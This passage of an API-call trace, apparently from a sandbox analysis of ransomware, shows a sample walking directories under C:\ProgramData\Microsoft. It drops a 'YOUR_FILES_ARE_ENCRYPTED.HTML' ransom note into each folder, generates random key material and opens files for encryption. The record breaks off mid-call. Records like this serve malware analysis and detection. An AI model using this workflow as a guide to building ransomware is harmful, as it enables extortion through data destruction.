lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x963315a8, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xde3156fc, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xde3156fc, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0155.249] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x963315a8, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xde3156fc, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xde3156fc, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.249] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x964fb1e0, 
ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xdb06b774, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xd56b6fd0, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x2f22, dwReserved0=0x0, dwReserved1=0x60, cFileName="Help_CValidator.H1D", cAlternateFileName="HELP_C~1.H1D")) returned 1 [0155.249] wnsprintfW (in: pszDest=0x7423080, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D") returned 76 [0155.249] lstrcmpW (lpString1="Help_CValidator.H1D", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.249] PathFindExtensionW (pszPath="Help_CValidator.H1D") returned=".H1D" [0155.249] lstrlenW (lpString=".H1D") returned 4 [0155.249] PathFindExtensionW (pszPath="Help_CValidator.H1D") returned=".H1D" [0155.249] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x9662c4b0, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xde50558e, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xde50558e, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x365fc, dwReserved0=0x0, dwReserved1=0x60, cFileName="Help_MKWD_AssetId.H1W", cAlternateFileName="HELP_M~1.H1W")) returned 1 [0155.249] wnsprintfW (in: pszDest=0x7423080, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W") returned 78 [0155.249] lstrcmpW (lpString1="Help_MKWD_AssetId.H1W", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.249] PathFindExtensionW (pszPath="Help_MKWD_AssetId.H1W") returned=".H1W" [0155.249] lstrlenW (lpString=".H1W") returned 4 [0155.249] PathFindExtensionW (pszPath="Help_MKWD_AssetId.H1W") returned=".H1W" [0155.249] FindNextFileW (in: hFindFile=0x42f3200, 
lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x9662c4b0, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xde6f5420, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xde6f5420, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x325ec, dwReserved0=0x0, dwReserved1=0x60, cFileName="Help_MKWD_BestBet.H1W", cAlternateFileName="HELP_M~2.H1W")) returned 1 [0155.249] wnsprintfW (in: pszDest=0x7423080, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W") returned 78 [0155.249] lstrcmpW (lpString1="Help_MKWD_BestBet.H1W", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.249] PathFindExtensionW (pszPath="Help_MKWD_BestBet.H1W") returned=".H1W" [0155.250] lstrlenW (lpString=".H1W") returned 4 [0155.250] PathFindExtensionW (pszPath="Help_MKWD_BestBet.H1W") returned=".H1W" [0155.250] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x9662c4b0, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xde767b2e, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xde767b2e, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x79f16, dwReserved0=0x0, dwReserved1=0x60, cFileName="Help_MTOC_help.H1H", cAlternateFileName="HELP_M~1.H1H")) returned 1 [0155.250] wnsprintfW (in: pszDest=0x7423080, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H") returned 75 [0155.250] lstrcmpW (lpString1="Help_MTOC_help.H1H", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.250] PathFindExtensionW (pszPath="Help_MTOC_help.H1H") returned=".H1H" [0155.250] lstrlenW (lpString=".H1H") returned 4 [0155.250] 
PathFindExtensionW (pszPath="Help_MTOC_help.H1H") returned=".H1H" [0155.250] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x98d10a72, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xde767b2e, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xde767b2e, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x3944, dwReserved0=0x0, dwReserved1=0x60, cFileName="Help_MValidator.H1D", cAlternateFileName="HELP_M~1.H1D")) returned 1 [0155.250] wnsprintfW (in: pszDest=0x7423080, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D") returned 76 [0155.250] lstrcmpW (lpString1="Help_MValidator.H1D", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.250] PathFindExtensionW (pszPath="Help_MValidator.H1D") returned=".H1D" [0155.250] lstrlenW (lpString=".H1D") returned 4 [0155.250] PathFindExtensionW (pszPath="Help_MValidator.H1D") returned=".H1D" [0155.250] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x9662c4b0, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xde767b2e, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xde767b2e, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x4, dwReserved0=0x0, dwReserved1=0x60, cFileName="Help_MValidator.Lck", cAlternateFileName="HELP_M~1.LCK")) returned 1 [0155.250] wnsprintfW (in: pszDest=0x7423080, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck") returned 76 [0155.250] lstrcmpW (lpString1="Help_MValidator.Lck", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.250] PathFindExtensionW 
(pszPath="Help_MValidator.Lck") returned=".Lck" [0155.250] lstrlenW (lpString=".Lck") returned 4 [0155.250] PathFindExtensionW (pszPath="Help_MValidator.Lck") returned=".Lck" [0155.250] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x96bd5e0c, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xde3156fc, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xde3156fc, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0xd53c7, dwReserved0=0x0, dwReserved1=0x60, cFileName="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", cAlternateFileName="HELP{9~1.H1Q")) returned 1 [0155.250] wnsprintfW (in: pszDest=0x7423080, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q") returned 103 [0155.250] lstrcmpW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.250] PathFindExtensionW (pszPath="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q") returned=".H1Q" [0155.250] lstrlenW (lpString=".H1Q") returned 4 [0155.250] PathFindExtensionW (pszPath="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q") returned=".H1Q" [0155.250] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x96bd5e0c, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xde3156fc, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xde3156fc, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0xd53c7, dwReserved0=0x0, dwReserved1=0x60, cFileName="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", cAlternateFileName="HELP{9~1.H1Q")) returned 0 [0155.250] FindClose (in: hFindFile=0x42f3200 | out: 
hFindFile=0x42f3200) returned 1 [0155.251] wnsprintfW (in: pszDest=0x7423080, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 86 [0155.251] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x594 [0155.251] WriteFile (in: hFile=0x594, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0155.253] CloseHandle (hObject=0x594) returned 1 [0155.253] GetProcessHeap () returned 0x270000 [0155.254] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7423080 | out: hHeap=0x270000) returned 1 [0155.254] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x963315a8, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xde3156fc, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xde3156fc, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="en-US", cAlternateFileName="")) returned 0 [0155.254] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0155.254] wnsprintfW (in: pszDest=0x7412070, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0155.255] CreateFileW 
(lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x590 [0155.255] WriteFile (in: hFile=0x590, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0155.257] CloseHandle (hObject=0x590) returned 1 [0155.257] GetProcessHeap () returned 0x270000 [0155.258] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7412070 | out: hHeap=0x270000) returned 1 [0155.258] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xd8429d0a, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0x963315a8, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="1.0", cAlternateFileName="")) returned 0 [0155.258] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0155.258] wnsprintfW (in: pszDest=0x7401060, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 76 [0155.258] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0155.258] WriteFile (in: 
hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0155.260] CloseHandle (hObject=0x58c) returned 1 [0155.261] GetProcessHeap () returned 0x270000 [0155.261] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7401060 | out: hHeap=0x270000) returned 1 [0155.261] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x85f7a2c7, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x85f7a2c7, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Client", cAlternateFileName="")) returned 0 [0155.261] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0155.262] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0155.262] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\assistance\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0155.262] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0155.264] CloseHandle (hObject=0x4a8) returned 1 [0155.264] GetProcessHeap () returned 0x270000 [0155.265] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 
[0155.265] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x19370e70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x96c2d3b0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x96c2d3b0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ClickToRun", cAlternateFileName="CLICKT~1")) returned 1 [0155.265] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun") returned 39 [0155.265] GetProcessHeap () returned 0x270000 [0155.265] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0155.265] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun" [0155.265] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\*" [0155.265] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x19370e70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x96c2d3b0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x96c2d3b0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0155.266] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, 
ftCreationTime.dwLowDateTime=0x19370e70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x96c2d3b0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x96c2d3b0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.266] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x19370e70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e501e50, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x2e501e50, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="5DF8E020-832F-493E-A40D-17A803C0D548", cAlternateFileName="5DF8E0~1")) returned 1 [0155.266] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548") returned 76 [0155.266] GetProcessHeap () returned 0x270000 [0155.266] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7400058 [0155.266] lstrcpyW (in: lpString1=0x7400058, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548" [0155.266] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\*" [0155.266] FindFirstFileW (in: 
lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x19370e70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e501e50, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x2e501e50, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0155.266] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x19370e70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e501e50, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x2e501e50, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.266] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x19370e70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e48fa30, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x2e48fa30, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="en-us.16", cAlternateFileName="")) returned 1 [0155.266] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16") returned 85 [0155.266] GetProcessHeap () returned 0x270000 [0155.266] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7410060 [0155.266] lstrcpyW (in: lpString1=0x7410060, 
lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16" [0155.266] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\*" [0155.267] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x19370e70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e48fa30, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x2e48fa30, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0155.267] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x19370e70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e48fa30, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x2e48fa30, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.267] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e4698d0, 
ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e4698d0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x22d02900, ftLastWriteTime.dwHighDateTime=0x1d0d7ee, nFileSizeHigh=0x0, nFileSizeLow=0x5765, dwReserved0=0x0, dwReserved1=0x60, cFileName="MasterDescriptor.en-us.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0155.267] wnsprintfW (in: pszDest=0x7410060, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\MasterDescriptor.en-us.xml") returned 112 [0155.267] lstrcmpW (lpString1="MasterDescriptor.en-us.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.267] PathFindExtensionW (pszPath="MasterDescriptor.en-us.xml") returned=".xml" [0155.267] lstrlenW (lpString=".xml") returned 4 [0155.267] PathFindExtensionW (pszPath="MasterDescriptor.en-us.xml") returned=".xml" [0155.267] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0155.267] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\5df8e020-832f-493e-a40d-17a803c0d548\\en-us.16\\masterdescriptor.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, 